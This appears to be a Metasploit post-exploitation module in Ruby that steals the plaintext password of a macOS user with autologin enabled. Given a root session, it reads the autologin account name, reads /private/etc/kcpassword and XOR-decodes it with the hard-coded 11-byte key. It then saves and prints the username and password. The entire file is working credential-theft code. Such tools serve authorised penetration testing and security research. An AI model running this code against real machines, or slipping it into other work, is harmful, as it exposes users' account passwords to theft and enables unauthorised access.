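##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::OSX::Priv

  # Fixed 11-byte key loginwindow uses to XOR-obfuscate the autologin password.
  # Because XOR is its own inverse, the same key both encodes and decodes
  # (extract/verify by XORing kcpassword with the known password).
  AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OSX Gather Autologin Password as Root',
        'Description' => %q{
          This module will steal the plaintext password of any user on the machine
          with autologin enabled. Root access is required.

          When a user has autologin enabled (System Preferences -> Accounts), OSX
          stores their password with an XOR encoding in /private/etc/kcpassword.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'Platform' => [ 'osx' ],
        'References' => [
          ['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html']
        ],
        'SessionTypes' => [ 'meterpreter', 'shell' ]
      )
    )

    register_advanced_options([
      OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword'])
    ])
  end

  # Module entry point: locate the autologin account, decode the kcpassword
  # file and store the result as a :password credential in the database.
  #
  # Fails with Failure::NoAccess when the session is not root,
  # Failure::NotVulnerable when no autologin account is configured, and
  # Failure::NotFound when the kcpassword file is missing or unreadable.
  def run
    # ensure the user is root (or can read the kcpassword)
    unless is_root?
      fail_with(Failure::NoAccess, 'Root privileges are required to read kcpassword file')
    end

    autouser = autologin_user
    if autouser.present?
      print_status "User #{autouser} has autologin enabled, decoding password..."
    else
      fail_with(Failure::NotVulnerable, 'No users on this machine have autologin enabled')
    end

    # read_file yields nil/empty when the path is absent or unreadable; fail
    # cleanly here instead of raising NoMethodError on nil.bytes in the decoder
    kcpass = read_file(kcpassword_path)
    if kcpass.blank?
      fail_with(Failure::NotFound, "Unable to read kcpassword file at #{kcpassword_path}")
    end

    decoded = decode_kcpassword(kcpass)

    # save in the database
    # Don't record a Login, since we don't know what service to tie it to
    credential_data = {
      workspace_id: myworkspace_id,
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      username: autouser,
      private_data: decoded,
      private_type: :password
    }

    create_credential(credential_data)
    print_good "Decoded autologin password: #{autouser}:#{decoded}"
  end

  private

  # Name of the account loginwindow logs in automatically, read from the
  # loginwindow preferences plist. stderr is discarded, so the result is an
  # empty string when the autoLoginUser key is not set.
  #
  # @return [String] account name, or empty/blank when autologin is off
  def autologin_user
    read_cmd = 'defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username'
    cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'")
  end

  # Reverse the kcpassword encoding: the file is processed in key-sized
  # (11 byte) chunks and each byte is XORed with the key byte at the same
  # offset. The field is NUL-terminated, so everything from the first NUL
  # onward is dropped.
  #
  # @param kcpass [String] raw contents of the kcpassword file
  # @return [String] decoded password (binary-encoded string)
  def decode_kcpassword(kcpass)
    key = AUTOLOGIN_XOR_KEY
    plain = kcpass.bytes.each_slice(key.length).flat_map do |chunk|
      chunk.each_with_index.map { |byte, idx| (byte ^ key[idx]).chr }
    end.join
    # /m and \z so the trailing bytes are removed even when one of them
    # decodes to a newline (plain `$` would stop at the line end)
    plain.sub(/\x00.*\z/m, '')
  end

  def kcpassword_path
    datastore['KCPASSWORD_PATH']
  end

  def user
    @user ||= cmd_exec('whoami').chomp
  end
end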